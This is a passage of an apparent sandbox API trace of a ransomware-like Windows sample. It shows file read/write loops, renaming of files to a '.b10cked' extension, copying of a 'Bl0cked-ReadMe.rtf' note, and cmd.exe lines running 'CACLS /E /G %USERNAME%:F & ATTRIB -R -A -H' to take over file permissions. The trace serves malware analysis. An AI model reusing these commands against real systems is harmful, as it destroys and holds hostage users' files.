dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x30400 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x2ff18 [0214.939] ReadFile (in: hFile=0x120, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0214.959] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0214.959] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0214.959] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x30400 [0214.959] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0214.959] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0214.959] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0214.959] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x30400 [0214.960] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0214.960] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0214.960] ReadFile (in: hFile=0x120, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0215.078] ReadFile (in: hFile=0x120, lpBuffer=0x123fd48, nNumberOfBytesToRead=0x91ff, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0x91ff, lpOverlapped=0x0) returned 1 [0215.087] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0215.087] WriteFile (in: hFile=0x120, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0215.088] WriteFile (in: hFile=0x120, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x91ff, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x91ff, lpOverlapped=0x0) returned 1 [0215.088] SetFilePointer (in: hFile=0x120, lDistanceToMove=-98815, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x18201 [0215.088] ReadFile (in: hFile=0x120, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0215.089] ReadFile (in: hFile=0x120, lpBuffer=0x123fd48, nNumberOfBytesToRead=0x91ff, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0x91ff, lpOverlapped=0x0) returned 1 [0215.102] SetFilePointer (in: hFile=0x120, lDistanceToMove=-98815, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x18201 [0215.102] WriteFile (in: hFile=0x120, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0215.102] WriteFile (in: hFile=0x120, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x91ff, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x91ff, lpOverlapped=0x0) returned 1 [0215.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NTUSER.DAT.LOG1", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0215.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NTUSER.DAT.LOG1", cchWideChar=15, lpMultiByteStr=0x13131ec, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NTUSER.DAT.LOG1", lpUsedDefaultChar=0x0) returned 15 [0215.106] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x30400 [0215.106] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0215.107] CloseHandle (hObject=0x120) returned 1 [0215.108] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\NTUSER~1.LOG") returned 0x1d [0215.109] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\") returned 0x11 [0215.109] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\NTUSER~1.LOG\" \"C:\\Users\\Default\\NTUSER.DAT.LOG1.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\NTUSER~1.LOG\" \"C:\\Users\\Default\\NTUSER.DAT.LOG1.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xe08, dwThreadId=0x600)) returned 1 [0215.110] CloseHandle (hObject=0x1b4) returned 1 [0215.110] CloseHandle (hObject=0x120) returned 1 [0215.110] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\", cchLength=0x11 | out: lpsz="C:\\USERS\\DEFAULT\\") returned 0x11 [0215.110] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\MSN Websites\\", cchLength=0x28 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\") returned 0x28 [0215.110] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\", cchCount1=17, lpString2="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\", cchCount2=40) returned 1 [0215.110] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\", cchLength=0x11 | out: lpsz="C:\\USERS\\DEFAULT\\") returned 0x11 [0215.110] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0215.110] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\", cchCount1=17, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0215.110] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0215.111] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0215.111] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0215.111] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\") returned 0x11 [0215.111] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0215.111] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0215.111] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xbbc, dwThreadId=0xb74)) returned 1 [0215.116] CloseHandle (hObject=0x1b4) returned 1 [0215.116] CloseHandle (hObject=0x120) returned 1 [0215.116] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\bl0cked-readme.rtf")) returned 0xffffffff [0215.116] GetLastError () returned 0x2 [0215.116] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\Default\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0215.121] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\bl0cked-readme.rtf")) returned 0x20 [0215.121] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0215.121] FindFirstFileW (in: lpFileName="C:\\Users\\Default", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0215.121] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0215.121] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0215.121] ReleaseMutex (hMutex=0xf8) returned 1 [0215.121] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0215.121] ReleaseMutex (hMutex=0xf8) returned 1 [0215.121] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0215.121] ReleaseMutex (hMutex=0xf8) returned 1 [0215.121] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0215.121] ReleaseMutex (hMutex=0xf8) returned 1 [0215.121] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG2" (normalized: "c:\\users\\default\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0215.121] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0215.121] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0215.121] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0215.122] CloseHandle (hObject=0x1b4) returned 1 [0215.122] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0215.122] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0215.122] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\Default\\NTUSER.DAT.LOG2\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\Default\\NTUSER.DAT.LOG2\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\Default\\NTUSER.DAT.LOG2\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\Default\\NTUSER.DAT.LOG2\"", lpProcessInformation=0x12fba4*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xb28, dwThreadId=0xa3c)) returned 1 [0215.126] WaitForSingleObject (hHandle=0x120, dwMilliseconds=0xffffffff) returned 0x0 [0216.113] CloseHandle (hObject=0x120) returned 1 [0216.113] CloseHandle (hObject=0x1b4) returned 1 [0216.113] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0216.113] ReleaseMutex (hMutex=0xf8) returned 1 [0216.113] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0216.113] ReleaseMutex (hMutex=0xf8) returned 1 [0216.113] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0216.113] ReleaseMutex (hMutex=0xf8) returned 1 [0216.113] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0216.113] ReleaseMutex (hMutex=0xf8) returned 1 [0216.113] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG2" (normalized: "c:\\users\\default\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0216.113] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.113] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.113] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.113] CloseHandle (hObject=0x1b4) returned 1 [0216.113] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\", cchLength=0x11 | out: lpsz="C:\\USERS\\DEFAULT\\") returned 0x11 [0216.113] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\", cchLength=0x11 | out: lpsz="C:\\USERS\\DEFAULT\\") returned 0x11 [0216.114] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\", cchCount1=17, lpString2="C:\\USERS\\DEFAULT\\", cchCount2=17) returned 2 [0216.114] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0216.114] ReleaseMutex (hMutex=0xf8) returned 1 [0216.114] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0216.114] ReleaseMutex (hMutex=0xf8) returned 1 [0216.114] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0216.114] ReleaseMutex (hMutex=0xf8) returned 1 [0216.114] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0216.114] ReleaseMutex (hMutex=0xf8) returned 1 [0216.114] CreateFileW (lpFileName="C:\\Users\\Default\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0216.116] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Searches\\Everywhere.search-ms", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\Default\\Searches\\Everywhere.search-ms", lpFilePart=0x12eab4*="Everywhere.search-ms") returned 0x2e [0216.116] GetLastError () returned 0x5 [0216.116] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0216.116] LocalFree (hMem=0x1c6cc8) returned 0x0 [0216.116] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0216.116] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0216.116] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0216.116] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0216.116] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0216.116] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0216.116] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\"", lpProcessInformation=0x12fba4*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x53c, dwThreadId=0xc68)) returned 1 [0216.120] WaitForSingleObject (hHandle=0x120, dwMilliseconds=0xffffffff) returned 0x0 [0216.433] CloseHandle (hObject=0x120) returned 1 [0216.433] CloseHandle (hObject=0x1b4) returned 1 [0216.433] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0216.433] ReleaseMutex (hMutex=0xf8) returned 1 [0216.433] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0216.433] ReleaseMutex (hMutex=0xf8) returned 1 [0216.433] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0216.433] ReleaseMutex (hMutex=0xf8) returned 1 [0216.433] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0216.433] ReleaseMutex (hMutex=0xf8) returned 1 [0216.433] CreateFileW (lpFileName="C:\\Users\\Default\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0216.433] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.433] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.434] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27322279697) returned 1 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xf8 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 